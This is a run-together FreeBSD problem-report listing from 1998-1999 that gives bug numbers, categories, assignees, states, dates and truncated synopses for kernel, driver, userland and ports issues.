kern/6525 Coral-Draw 5 CD crashes 2.2.6-STABLE a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty o [1998/05/08] bin/6557 /bin/sh is broken o [1998/05/10] bin/6577 /bin/sh environment variables not set in o [1998/05/11] ports/6591 se KDE starts /usr/bin/kzip instead of /usr/ o [1998/05/12] kern/6603 ncr driver hangs under high load o [1998/05/12] bin/6609 gmp.h not installed o [1998/05/17] kern/6670 PANIC on boot with FreeBSD 3.0 (same comp s [1998/05/19] kern/6686 [STABLE] -stable does not support large I o [1998/05/20] kern/6706 mount_msdos+mount_null+mc=panic o [1998/05/25] kern/6751 audio cd play suddenly stops. o [1998/05/25] kern/6755 peter Tulip (if_de) driver buggy in -current o [1998/05/27] kern/6771 peter panic: Bad nfs svc reply s [1998/05/27] misc/6773 [PATCH] tempnam.c security problems o [1998/06/01] misc/6824 peter Intel EtherExpress 100+, 2.2.6 NFS troubl s [1998/06/02] bin/6830 make(1) exhibits confusing and non-standa s [1998/06/04] kern/6854 [PATCH] probing brooktree849 capture card s [1998/06/04] kern/6858 inetd in realloc(): warning: junk pointer o [1998/06/04] misc/6861 [PATCH] netboot error o [1998/06/05] kern/6865 OS crashes when exiting shell with suspen o [1998/06/10] kern/6908 kernel crash from user land o [1998/06/19] bin/6994 The netstat(1) -s generates wrong output f [1998/06/19] i386/6996 Occasional complete lockup of 2.2.5R s [1998/06/22] bin/7019 [security] pwd.db almost always contains s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] kern/7038 shimon Kernel panic caused by DPT driver (Got a s [1998/06/24] bin/7043 the fstat command doesn't know ISOFS, MSD o [1998/06/24] i386/7057 3Com 3C509 locks up, or has >1000ms rtt u s [1998/06/24] bin/7059 sh dumps core on this script o [1998/06/24] ports/7061 ache fspclient's grab command fails (and remov o [1998/07/05] ports/7167 ache elm cannot pgp for more than one recipien s [1998/07/05] kern/7169 cannot use accton on a append-only file o [1998/07/05] kern/7178 sos IDE Western Digital hard disk detection e s [1998/07/06] misc/7190 jkh "Invalid partition table" after new insta s [1998/07/10] kern/7237 NCR SCSI driver ch0 troubles o [1998/07/11] kern/7245 processes die with signal 6, if machine o o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c o [1998/07/21] conf/7354 source distribution selection bug when in f [1998/07/22] kern/7367 panic: malloc: wrong bucket o [1998/07/23] ports/7383 imp socks5 + ssh + redirection not working o [1998/07/26] kern/7405 in pmap_changebit, pmap_pte_quick() retur s [1998/07/27] kern/7410 [PATCH] driver for arlan-655 s [1998/07/27] i386/7420 [PATCH] Maximum socket buffer size (SB_MA o [1998/07/28] kern/7424 Machine crashes do not occur very often, o [1998/07/30] bin/7446 jdp Dlopen succeed in particular cases, but i o [1998/08/04] ports/7490 ache `setenv LANG/LC_CTYPE C` makes tcsh unusa s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/08/10] kern/7557 -current machine running Diablo, lockup, s [1998/08/10] kern/7561 CDROM (wcd) is prone to lock up system/pr s [1998/08/10] kern/7562 Running wine can cause other applications o [1998/08/12] bin/7587 There is no pthread_cancel() in libc_r.a! o [1998/08/18] kern/7658 (1) rlogin from some host to the FreeBSD o [1998/08/18] kern/7664 scsiformat reports '0' for all parameters o [1998/08/18] conf/7665 sysinstall quits silently o [1998/08/19] kern/7678 Problems with a 386-16 f [1998/08/20] i386/7698 n_hibma scotty/tkined library error o [1998/08/23] kern/7727 Processes get wedged in 'getblk' on 2.2.7 o [1998/08/27] kern/7754 kernel panics if NFS server uses LKM vs. o [1998/08/27] bin/7756 disklabel misbehaving on seriously sick d o [1998/08/27] kern/7764 ps(1) hangs in pfslck/lockrd - All subseq o [1998/08/27] kern/7766 de driver still buggy - random ifc death o [1998/08/27] kern/7767 de driver still buggy - power cycle of de o [1998/09/01] kern/7797 System halted with "panic: pmap_release: o [1998/09/02] i386/7815 probe can't find wdc0 s [1998/09/03] gnu/7821 awk in free(): warning: chunk is already o [1998/09/03] conf/7823 sysinstall will not install XFree o [1998/09/09] bin/7872 [PATCH] mountd(8) can apply flags to wron o [1998/09/09] bin/7876 gethostbyname flags temporary failure as o [1998/09/09] bin/7877 billf libpcap and tcpdump need updating o [1998/09/10] kern/7880 mount_cd9660 incorrect on multitrack CD-R o [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/12] conf/7908 wrong perms on objformat after upgrade o [1998/09/16] kern/7950 Trap 12 while executing wine o [1998/09/16] gnu/7951 The gnu readline library core dumps when o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas a [1998/09/19] ports/7987 ports Can't post news with TRN + NNTPCACHE o [1998/09/22] conf/8031 [patch] /etc/rc looks for /etc/sendmail.c o [1998/09/28] misc/8070 can't get a system with an NCR 810 contro o [1998/09/28] i386/8081 Problem with MULTIPORT driver and Boca BB o [1998/09/29] bin/8085 sendmail startup could be backgrounded o [1998/09/30] gnu/8099 [patch] some bugs in cpio o [1998/10/03] kern/8137 [patch] quotaoff followed by quotaon can o [1998/10/05] kern/8158 sio driver breaks in 2.2.7R in kernels wi o [1998/10/06] kern/8180 open("..",O_RDONLY|O_NONBLOCK) fails o [1998/10/07] bin/8195 ee dumps core on window resize o [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/10/08] kern/8215 Creating 2 root partitions in sysinstall o [1998/10/11] bin/8266 [patch] nfsd should allow just nfs versio o [1998/10/12] bin/8281 writev() in libc_r causes loop o [1998/10/13] kern/8312 Under heavy load, the system panics with o [1998/10/14] bin/8322 Mail doesn't respect REPLYTO in .mailrc o [1998/10/14] kern/8324 failure to deliver SIGIO when fildes mark o [1998/10/19] conf/8379 check_rcpt returns OK for nonexistent add o [1998/10/20] kern/8380 swap_page error: out of swap space o [1998/10/20] i386/8385 2.2.7 hangs while detecting type of COM1' o [1998/10/20] ports/8394 peter rdist6 won't compile--tries to use MOUNT_ o [1998/10/21] i386/8397 Code using popen compiled on BSDI BSD/OS o [1998/10/22] i386/8414 ibcs2 emulation sets serial baud-rate inc o [1998/10/22] kern/8415 SMP kernel freezes while downloading larg s [1998/10/22] kern/8417 3.0 config(8) doesn't check that root fs o [1998/10/22] i386/8418 sh MAKEDEV all - fails to create hard lin o [1998/10/23] kern/8423 Intel PILA8461 NIC panics 2.2.7 during pr o [1998/10/24] i386/8435 boot.flp does not give shell prompt after o [1998/10/28] misc/8480 odd Korean timedef(LC_TIME) o [1998/10/31] bin/8518 freopen() in append mode followed by ftel o [1998/11/01] kern/8534 insufficient support routines for poll(2) o [1998/11/03] kern/8561 /kernel inode change time changes every r o [1998/11/03] i386/8567 Intel EtherExpress Pro/10 driver (if_ex.c o [1998/11/05] kern/8580 Hanging NFS pagein in nfs_bio.c (2.2.7, w o [1998/11/07] kern/8590 kernel incorrectly recognizing Maxtor 11. o [1998/11/07] kern/8596 panic: page fault while using ping's reco o [1998/11/08] kern/8607 maxprocsperuid setting causes sybase/linu o [1998/11/08] kern/8619 EXT2FS should be in GENERIC kernel o [1998/11/08] ports/8622 peter exmh2 has problems with some date formats s [1998/11/09] misc/8623 wollman [MFC] Time zone for Japan is strange (see o [1998/11/10] bin/8646 Implement rlogind -a option o [1998/11/11] kern/8655 Umount trouble of SCSI removable device o [1998/11/11] kern/8657 nfs client hung in nfs_bwrite/vfs_busy_pa o [1998/11/12] kern/8669 aio_write() and aio_read() do not work AT o [1998/11/14] kern/8683 sos Problems with Atapi in 3.0... o [1998/11/14] bin/8685 sending a SYST by ftp client closes conne o [1998/11/17] kern/8729 SYSV Semaphore blocks all threads o [1998/11/18] bin/8745 wosch adduser permit adding `root' and mail ali o [1998/11/20] kern/8773 Intel AN430TX motherboard ps/2 port not r f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S o [1998/11/23] kern/8824 Incorrect driver unit number in IDE BusMa o [1998/11/24] kern/8834 NFS can corrupt local file cache o [1998/11/24] conf/8854 boot.flp does not probe atapi cdrom o [1998/11/24] i386/8855 sos can't mount CD in ATAPI drive after eject o [1998/11/25] bin/8865 syslogd hangs with serial console a [1998/11/28] kern/8875 Patch to allow DMA IDE with generic chips o [1998/11/29] conf/8903 /etc/rc can do NFS mounts before the netw o [1998/12/01] i386/8924 File transfers. Upload is 71Kbs downloa o [1998/12/02] kern/8940 system clock runs extremely slowly (and s o [1998/12/06] kern/8981 this also fixes X crashes and sio silo ov o [1998/12/09] kern/9030 DMPno2 - PCCards are not being recognised o [1998/12/10] i386/9044 #.0 pkgs require libkrb o [1998/12/16] kern/9095 swap detect error o [1998/12/19] kern/9129 Is it miss take ? So, ep deriver dose not o [1998/12/20] i386/9140 NIS "Magic cookie" in master.passwd slays o [1998/12/21] kern/9163 [patch] squid does not join a multicast g o [1998/12/27] bin/9214 kldload(8) error messages are inadequate o [1998/12/30] i386/9244 2.2.8 RELEASE Fixit floppy doesn't work.. o [1998/12/31] bin/9252 [patch] login program "login" don't set K o [1999/01/03] kern/9296 pps driver missing header file o [1999/01/03] kern/9297 pps driver doesn't clear ppbus control po o [1999/01/06] bin/9350 nvi incorrectly reads files with very lon o [1999/01/06] kern/9355 can't select() for writes on a bpf o [1999/01/07] bin/9362 "lpc start queue" doesn't work in 3.0-R & o [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/09] kern/9407 "make kernel" yields buggy kernel in cera o [1999/01/09] kern/9408 parameter reversed to a pci_cfgwrite in p o [1999/01/09] kern/9411 System crash on swapping to hole-files o [1999/01/09] kern/9413 profiling does not work with elf kernels o [1999/01/10] i386/9431 wd.c Does nto recognize certain LBA disks o [1999/01/11] bin/9440 obrien amd can't mount filesystems with type:=uf o [1999/01/11] bin/9444 mount_mfs uses lots of swap. o [1999/01/12] bin/9464 fenner Fix for fetch ignoring FTP_PASSIVE_MODE e o [1999/01/13] kern/9478 support for running a script from kldload o [1999/01/14] kern/9487 pcm: mixer's synth and cd devices are swa o [1999/01/14] bin/9495 su doesn't look at login.cnf all the time o [1999/01/15] bin/9516 ftpd doesn't honor invalid shelll in logi o [1999/01/17] kern/9537 ep0 driver : no buffer space available o [1999/01/17] bin/9544 syntax error concerning loading vinum fro o [1999/01/17] kern/9548 UNION fs corrupts data and has undefined o [1999/01/17] kern/9550 The latest -current as of 17 January has o [1999/01/21] kern/9599 SMP hang after reseting CPU 1 o [1999/01/21] kern/9612 grog NFS mounts on dual-homed server may hang o [1999/01/22] docs/9618 hoek many typos in groff_mm(7) o [1999/01/24] ports/9665 ache cannot start apache server o [1999/01/25] kern/9673 ISO CD-ROM Problem o [1999/01/25] ports/9688 cwt The current tcl80 port has problems, does o [1999/01/28] i386/9759 Tar process hangs on buggy tapes o [1999/02/01] kern/9862 system crashes writing to msdos jaz disk o [1999/02/02] kern/9883 MGET()(and variants) return NULL with M_W o [1999/02/04] misc/9903 thread enabled program can't use popen/sy o [1999/02/04] kern/9910 Heavy traffic renders FreeBSD acting as f s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/06] i386/9933 No error reported writing to write-protec o [1999/02/06] kern/9935 vmstat reprots bad AVM values o [1999/02/08] kern/9961 When loading if_ppp_mod.o system crashes, o [1999/02/08] i386/9962 Install Panics in with integer divide fau o [1999/02/08] kern/9974 Large amounts of kernel clock drift with o [1999/02/09] kern/9980 savecore fails with large (2gig+) swap pa o [1999/02/09] bin/9982 inet_addr(3) should be return 32bit uint. o [1999/02/10] misc/10009 jdp dlopen will crash when opening some strip o [1999/02/11] kern/10021 MOUNTING A EXT2FS A AFTER MOUNTING AN MSD o [1999/02/11] bin/10031 ypxfr does not work with Solaris master s o [1999/02/13] kern/10066 problem with a X-Window and syscons drive o [1999/02/14] i386/10089 ATAPI tape driver (wst) doesn't handle En a [1999/02/14] ports/10094jfitz autogeneration of msql user failed o [1999/02/15] kern/10107 interlock situation with exec_map and a p o [1999/02/18] i386/10150 Compaq fxp0 Does not work on 3.0 or 3.1 b o [1999/02/18] i386/10151 ATAPI CD problem o [1999/02/19] conf/10163 init does not start when /var/msgs is a s o [1999/02/23] bin/10230 -T and -B not implemented on filehandles o [1999/02/25] misc/10259 FTP install hangs for 3.1-RELEASE o [1999/02/25] bin/10264 passwd(1) tryis NIS even with `-l' switch o [1999/02/25] kern/10265 file locking does not work with kernel pt o [1999/02/26] kern/10280 Display Adapters (PCI) probed wrong way - o [1999/02/28] misc/10302 installer o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/02/28] kern/10316 le0 goes OACTIVE after some time o [1999/03/01] bin/10341 memory leak in setenv(3) o [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/03] kern/10381 hlfsd/NFS failure -- directory cached bet a [1999/03/04] ports/10385billf New port: apache13-modperl o [1999/03/05] kern/10411 top, vmstat, iostat show 0% cpu idle & us o [1999/03/06] misc/10418 libpam is built before libradius/libtacpl o [1999/03/07] kern/10466 resume causes crashes if BIOS extmem != R o [1999/03/08] kern/10492 broadcast IP address can be set on interf o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/09] bin/10511 incorrect return value in kvm_read(3) and o [1999/03/11] bin/10553 syslogd suddenly stopped logging o [1999/03/14] kern/10581 Kernel panic while using find on an ext2 o [1999/03/14] kern/10594 EXT2FS mount problems o [1999/03/14] bin/10596 I can't find out where someone is logged o [1999/03/15] misc/10599 [PATCH included]malloc/free breaks in cer o [1999/03/15] kern/10603 dcs Random system panics o [1999/03/15] kern/10607 Fast forwarding breaks when arp cache exp o [1999/03/16] bin/10615 make installworld DESTDIR=/some/dir o [1999/03/16] i386/10626 RTC BIOS diagnostic error on install o [1999/03/16] bin/10633 obrien [patch] tcpslice timezone problem and upd o [1999/03/17] i386/10646 Bridge code missing from ed0 driver in 3. o [1999/03/18] ports/10665ports ports/graphics/sane needs access to /dev/ o [1999/03/19] kern/10671 setlogin(2) return EINVAL for length of n o [1999/03/19] kern/10676 3.1-RELEASE deadlocks under load with pro o [1999/03/20] kern/10698 de driver doesn't work with some tulip bo o [1999/03/23] kern/10747 [PATCH] ipfirewall `deny' rules act as `r o [1999/03/24] bin/10774 sio0 doesn't work well, i belive the prob o [1999/03/24] kern/10778 "ipforward_rt" is not cleared when routin o [1999/03/25] bin/10784 `make aout-to-elf-build' died in /usr/src o [1999/03/25] bin/10785 make aout-to-elf-install died in info tar o [1999/03/25] kern/10789 Second config of kernel doesn't overwrite o [1999/03/26] bin/10805 h2ph incorrectly deals with #error and #w o [1999/03/26] bin/10807 host(1) is broken - multiple options in o o [1999/03/27] bin/10821 des getpwent() fails on NIS clients after dro o [1999/03/29] i386/10862 wd.c STILL cannot recognize correct disk o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec o [1999/03/30] misc/10879 Cannot build aout binaries under 3.1-RELE o [1999/03/30] bin/10880 Profiler libraries missing o [1999/04/01] bin/10912 /bin/sh: Fix to prevent infinite loops on o [1999/04/03] i386/10928 su reboots the system after one day uptim o [1999/04/03] i386/10935 PCI cards detected twice o [1999/04/04] ports/10946se kdm 1.1 does not work correctly - XBINDIR o [1999/04/05] bin/10963 brian date -v dosen't quite work o [1999/04/05] i386/10969 kernel fails to compile with ccs0 o [1999/04/06] i386/10983 lnc NIC driver doesn't work o [1999/04/06] bin/10991 lpd hangs system if printer not ready on f [1999/04/07] ports/11003ports wmcdplay is not capable of playing an AUD o [1999/04/07] kern/11004 Quota Issues on SMP o [1999/04/07] bin/11005 `umount -f' does not work if the NFS-serv o [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim o [1999/04/10] ports/11059ache ports/security/pgp does not extract o [1999/04/11] kern/11080 fatal trap 18 while trying to mount inval o [1999/04/11] kern/11084 3.1-R kernel trap 12 with interrupts o [1999/04/13] kern/11115 Sockets die in LAST_ACK and FIN_WAIT_1 st o [1999/04/13] bin/11119 NFS quotas fail to report if alternate fi o [1999/04/14] bin/11137 /bin/ps output loses the values for all p o [1999/04/16] kern/11164 The ie network driver panics during the i o [1999/04/16] bin/11169 warning: pointer to wrong page in cron(8) o [1999/04/18] kern/11199 3.1-RELEASE kernel page fault (trap 12) u o [1999/04/18] i386/11200 AMD PCnet lnc0/lnc1 problem o [1999/04/18] kern/11208 Complete system hang/freeze. No PANIC me o [1999/04/19] bin/11221 comm doesn't obey current locale collatio o [1999/04/20] bin/11247 fetch doesn't notice FTP error after RETR o [1999/04/21] kern/11255 Fore System ATM Card not working o [1999/04/21] kern/11266 frequent crashes with "Page fault, fatal o [1999/04/22] bin/11283 fetch http-timeout/timestamp bug o [1999/04/23] i386/11291 anic: ffs_alloccg: map corrupted o [1999/04/23] bin/11296 fetch(1) fails to resolve names in http m o [1999/04/26] conf/11336 Broken data sent to printer through devic o [1999/04/28] kern/11366 Filesystem can cause hang/crash in certai o [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/04/29] bin/11382 generated code using rpcgen with -b optio o [1999/04/29] kern/11385 PCNet/PCI Ethernet adapter works in 3.1-R o [1999/04/29] i386/11395 ghostscript5.50 does not print properly, o [1999/04/30] kern/11405 pwd_mkdb with no tmp space leads to kerne o [1999/05/02] i386/11454 mkdir() and chdir() doesn't check argumen o [1999/05/03] kern/11462 CS network interface driver (for CS89XX b o [1999/05/03] bin/11464 obrien union copies likely broken for alpha egcs o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 msmith CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] kern/11513 cannot mount CD-ROM: Device not configure o [1999/05/05] misc/11523 3.1-STABLE BRIDGE option does not work o [1999/05/05] misc/11525 [PATCH] Networking patches to increase # o [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/07] kern/11563 pci_unmap_int doesn't do anything o [1999/05/10] ports/11636jfitz p5-Mail-Folder missing dependencies o [1999/05/12] i386/11664 lnc1 NIC fail to work o [1999/05/12] bin/11666 ypserv fails to reply host name resolutio o [1999/05/12] kern/11679 httpd and perl5 processes stuck in "nocha o [1999/05/13] kern/11686 APM: Always "Resume failure" from suspend o [1999/05/13] kern/11692 3.1-stable deadlock o [1999/05/13] kern/11697 dg Disk failure hangs system o [1999/05/14] i386/11720 FreeBSD 2.2.8 can't load fixit disk o [1999/05/18] kern/11766 Can not traceroute through ipnat. o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/19] misc/11778 mpz_get_str() in libgmp leads up to cored o [1999/05/19] misc/11790 boot manager bug o [1999/05/20] misc/11800 gibbs Problem with scsi AHA2940 and sony SDT-20 o [1999/05/20] i386/11801 Remounting CD on IDE CDROM after eject fa o [1999/05/20] kern/11808 read/write mounted write-protected floppi o [1999/05/21] kern/11815 mjacob SCSI tape driver fails on media type reco o [1999/05/21] kern/11821 /dev/fd0a hangs on large files, including o [1999/05/22] docs/11852 jkh 3.X install requires 12MB of RAM, not 8 o [1999/05/23] kern/11867 Sound driver loses interrupts, no sound o [1999/05/28] kern/11911 3.1-R : writing file larger than floppy s o [1999/05/28] conf/11913 jkh Problem about /stand/sysinstall and /etc/ o [1999/05/28] kern/11915 access system call says file is readable o [1999/05/28] kern/11919 kldload doesn't return error on loading a o [1999/05/28] kern/11922 missing reentrant interfaces for getpwnam o [1999/05/29] kern/11928 kldload loads kernel modules even if ther o [1999/05/29] kern/11936 wine don't work (SMP) (-STABLE) o [1999/05/29] kern/11937 vm problems after havy memory usage o [1999/05/31] kern/11969 VM_fault with mmap'd CDROM data. o [1999/06/01] ports/11977ports Eterm port is unable to access .Xauthorit o [1999/06/02] i386/11991 fdisk does not assign slices to unused pa o [1999/06/02] bin/11992 /usr/src/sbin/mountd/mountd.c has '#ifdef o [1999/06/04] kern/12022 System clock timewarps o [1999/06/06] bin/12054 explicit -ltermcap after -lncurses causes o [1999/06/06] kern/12062 sa tape driver with Cipher 60M SCSI QIC t o [1999/06/08] bin/12091 syslog packets from a remote machine are o [1999/06/08] kern/12092 vpo driver not working in 3.2-RELEASE o [1999/06/09] kern/12104 Certain cdcontrol commands don't work pro o [1999/06/10] conf/12116 ASCII and US-ASCII locale wrongly aliased o [1999/06/10] bin/12120 named crashes. o [1999/06/10] gnu/12122 cc hangs on STDIN with -pipe and .s files o [1999/06/11] bin/12136 obrien /sbin/dhclient-script: weird route comman o [1999/06/11] bin/12137 something wrong with shell -- functions w o [1999/06/12] ports/12174ache bash terminate with corefile if pid > 320 o [1999/06/12] gnu/12175 gdb crashes with pids > 32736 o [1999/06/13] bin/12191 wcol is trying to allocate a shared memor o [1999/06/15] misc/12221 djpeg halt's freebsd box o [1999/06/15] ports/12234ports imlib-1.9.4/gdk_imlib/rend.c has syntax e o [1999/06/16] bin/12242 segmentation fault running /usr/bin/fmt o [1999/06/16] kern/12247 userlevel program let kernel hang o [1999/06/17] kern/12262 pcm sound driver with SB16pnp does not ap o [1999/06/18] bin/12272 The ctype locales print an error message o [1999/06/18] kern/12274 cd mount problem o [1999/06/20] kern/12305 clock() ticks backwards o [1999/06/21] kern/12320 error 6: panic: cannot mount root (2) o [1999/06/22] bin/12349 des 3.2-R inetd doesn't re-read ALL configura o [1999/06/25] conf/12387 CDROM boot failure on Thinpad 770X, 380ED o [1999/06/25] kern/12394 3.2-RELEASE, rl0 ethernet interface freez o [1999/06/28] kern/12434 signal 11 (core dumped) on mysqld when ma o [1999/06/30] kern/12464 bad reference in struct vm_zone o [1999/07/01] kern/12484 [PATCH] bpf_filter() broken o [1999/07/03] bin/12496 yppush broken when pushing to 2 or more s o [1999/07/03] bin/12497 src/etc/periodic/daily/150.clean-hoststat o [1999/07/04] kern/12508 gdb fails to vmcore.0 o [1999/07/06] i386/12529 Linksys ether16 NE2000 compat. won't conf o [1999/07/06] bin/12538 getpwuid() NIS UID override fails o [1999/07/06] ports/12541ports gtk installs itself where it can't be fou o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/07] docs/12557 nik There are no man pages for the widely use a [1999/07/08] bin/12564 jkh Sysinstall can not use live filesystem fr o [1999/07/09] misc/12577 Can't link code using catopen o [1999/07/09] ports/12584stb directories made during 'make install' ar o [1999/07/13] kern/12632 Panic (trap 18) with Symbios SCSI control o [1999/07/14] ports/12637ports patch to help multi-byte support in windo o [1999/07/14] misc/12640 Can use 2nd CD-ROM for fixit mode. o [1999/07/15] kern/12646 IGMP reports not sent if no multicast rou o [1999/07/16] gnu/12662 tar verification doesn't work in 3.2-RELE o [1999/07/18] kern/12703 tx0 truncates skip packets o [1999/07/20] ports/12714ports dylan port doesn't compile o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/07/21] conf/12745 diffs to delay start of amd rwhod timed o o [1999/07/21] ports/12746ache problem with bash-2.03(1) port (/usr/port o [1999/07/21] i386/12749 marcel Bug in link() and all other filename func o [1999/07/22] kern/12758 Adjusting the idle priority of a process o [1999/07/23] i386/12771 lpt hangs and never works again, even aft o [1999/07/24] kern/12800 buffer leak in cluster_wbuild o [1999/07/26] alpha/12821alpha slib.aq for the 3.2-RELEASE alpha distrib o [1999/07/26] ports/12824dirk MySQL client only compile doesn't check t o [1999/07/27] kern/12831 sos CD-rom cannot be mounted o [1999/07/27] conf/12832 config -g creates broken Makefile in 3.2- o [1999/07/27] kern/12838 PC-Card ctlr(0) Vadem 365 support seems b o [1999/07/28] misc/12856 installworld over nfs broken (3.2S) o [1999/07/29] kern/12869 panic: softdep_flushfiles: looping o [1999/07/30] kern/12884 Hot to panic FreeBSD-3.2-Release o [1999/07/31] ports/12905jmz Graphical setup utility won't always inst o [1999/08/01] bin/12911 alfred NFS umounts are not properly done if just o [1999/08/01] bin/12912 [PATCH] lpd leaves lock file permissions o [1999/08/02] kern/12927 [PATCH] using BROKEN_KEYBOARD_RESET optio o [1999/08/02] ports/12930asami libtool create defuct makefiles if PREFIX o [1999/08/03] misc/12938 gethostbyaddr(209.201.116.19) - Bus error o [1999/08/03] ports/12949ports Fix for rtsp_proxy port. Patches from Jon o [1999/08/04] kern/12979 Response time continually slows on idle m o [1999/08/05] conf/12984 /etc/rc* does not contain any support for f [1999/08/05] docs/12988 doc [Patch] Fix more occurances of 'sd' in FA o [1999/08/05] kern/12991 system queue is cleared when a port or pi o [1999/08/06] kern/12996 ifconf in sys/net/if.c returns larger buf o [1999/08/06] bin/13008 pthread_kill does not always work o [1999/08/07] conf/13013 Selecting CDROM as install media doesn't o [1999/08/08] kern/13022 ipfilter is out-of-date o [1999/08/08] misc/13027 sysinstall has no /dev entry for wfd0s4 ( o [1999/08/09] kern/13049 [PATCH] NFS replies with incorrect source o [1999/08/10] i386/13058 Installation hangs after commit f [1999/08/13] pending/13113gnats-adminpanic related (proberbly) to vnode o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/08/14] ports/13145se kaudioserver runs amok on logout o [1999/08/15] kern/13150 panic: ufs_dirbad: bad dir o [1999/08/15] ports/13170ports new port: UW-Imap with maildir and qmail o [1999/08/15] gnu/13172 Bug in workaround of russian locale & sor o [1999/08/16] kern/13180 panic: ffs_alloccg: map corrupted o [1999/08/17] kern/13196 [BTX] page in BTX has problem(quit key) o [1999/08/17] kern/13198 panic: vm_fault: fault on nofault entry o [1999/08/17] gnu/13200 The assembler chokes on very long operand o [1999/08/18] kern/13234 .../netinet/ip_input.c should include opt o [1999/08/21] bin/13286 jhay [SECURITY] Potential IPXrouted(8) /tmp se o [1999/08/21] bin/13292 Ping -s does not work o [1999/08/24] bin/13350 make clean in bsd.obj.mk no longer proper o [1999/08/24] ports/13370ache elm-port upgraded, improved o [1999/08/25] misc/13378 Tecra 8000 hangs in UserConfig, cannot co o [1999/08/25] kern/13382 Only 1 parallel port supported if pps ena o [1999/08/25] bin/13383 sys/netinet/in.h violates C++ spec. o [1999/08/26] ports/13396ports Diskusage-1.00 Port o [1999/08/26] kern/13405 syslogd get system hang o [1999/08/27] gnu/13427 gdb reports wrong info o [1999/08/28] gnu/13438 objc forward core dump using system cc o [1999/08/29] i386/13452 changing to root device wd0s1a \n error 2 o [1999/08/29] bin/13463 /bin/sh does not handle interrupts correc o [1999/08/30] misc/13470 Old problem re-introduced: TCP sucket buf o [1999/08/30] ports/13471ports New port for UdmSearch www search engine o [1999/08/31] bin/13504 troubles with the ipfw tool o [1999/09/01] kern/13517 hang system o [1999/09/05] kern/13587 Voxware MIXER_READ ioctl corrupts memory o [1999/09/06] kern/13593 Problems with FIFO and select o [1999/09/07] kern/13612 gibbs "Timedout SCB handled by another timeout" o [1999/09/07] kern/13630 system halts after npx0 detected on 3.2 i o [1999/09/07] kern/13632 Floppy hangs system o [1999/09/08] ports/13636billf beroftpd also affected by proftpd/wuftpd o [1999/09/08] kern/13644 select(2) timer inaccurate, especially wi o [1999/09/08] kern/13646 Kernel Trap error when booting 3.3-RC ker o [1999/09/09] i386/13655 sysmouse, signal 10 and XF86_S3 o [1999/09/09] ports/13656obrien update ports: dlint 1.3.3 o [1999/09/10] kern/13678 sos hard lockup's on tsleep in atapi_queue_cm o [1999/09/10] bin/13679 ncurses-based programs eat 100% CPU after o [1999/09/10] bin/13691 tcpslice cannot extract over 2GB part of o [1999/09/11] bin/13703 MCNP compilation problem o [1999/09/12] bin/13711 root fs not properly unmounted after shut o [1999/09/12] ports/13714ports netatalk-1.4b2+asun2.1.3 fails chmod g+s o [1999/09/13] kern/13721 yokota There is no way to force system panic fro o [1999/09/13] conf/13724 Prevent ".: Out of file descriptors" erro o [1999/09/13] gnu/13729 strip(1) exits with an error on script fi o [1999/09/13] kern/13736 enabling NAT on 3.3RC results in panic sb o [1999/09/13] kern/13740 wrong IP statistics o [1999/09/14] docs/13746 doc Incorrect version in FAQ o [1999/09/14] kern/13752 "tl0: adapter check: 180005" mesages keep o [1999/09/15] kern/13757 wpaul tl0: adapter check: 180005 mesages keep c o [1999/09/15] i386/13765 memory problem: compilation of emacs dies o [1999/09/15] bin/13766 ldconfig doesn't recognize symbolic links o [1999/09/15] bin/13768 sh MAKEDEV cdN creates all cd(N-1)-device o [1999/09/15] misc/13771 brian Packet fragment filter bug in user-land P o [1999/09/16] conf/13775 multi-user boot may hang in NIS environme o [1999/09/16] ports/13776jmz The XFree86-3.3.5 port -- one of the kerb o [1999/09/16] conf/13785 boot block/manager problem at installatio o [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/18] kern/13810 3.3 panic rlist_free: free start overlaps o [1999/09/18] i386/13811 ide cdrom stops recognizing audio cdroms o [1999/09/19] bin/13818 `ipfw' doesn't grok "log" keyword o [1999/09/19] misc/13837 peter src/contrib/bind is outdated. o [1999/09/19] ports/13839se kdegraphics11 'make PREFIX' fix, one comp o [1999/09/19] i386/13847 missing support for INT 0x13 extensions i o [1999/09/20] i386/13857 Problem with switching between processes o [1999/09/22] conf/13900 jkh [PATCH] sysinstall can get SIGPIPE if a d o [1999/09/22] alpha/13912alpha unaligned access Problem seems to be aff o [1999/09/23] misc/13920 pppd acts differently on 3.3-RELEASE ("mi o [1999/09/24] ports/13931ports socks5 port is out of sync. 1.0r9 is no l o [1999/09/24] kern/13941 ncr0: SCSI phase error on GENERIC kernel o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/26] bin/13980 Parameter expansion pattern removal bug i o [1999/09/27] docs/13993 doc Another commercial database app for FreeB o [1999/09/27] kern/13997 phk RLIMIT_NPROC works unadequately for jails o [1999/09/28] kern/14026 Many network connections get left in the o [1999/09/28] i386/14027 "disklabel -r -w" on new disk reports "No o [1999/09/28] kern/14033 Data acq process gets stuck in vmopar o [1999/09/29] kern/14042 mbuf shortage and allocation with M_WAIT o [1999/09/30] ports/14045ports Upgraded Xmms to version 0.9.5.1 o 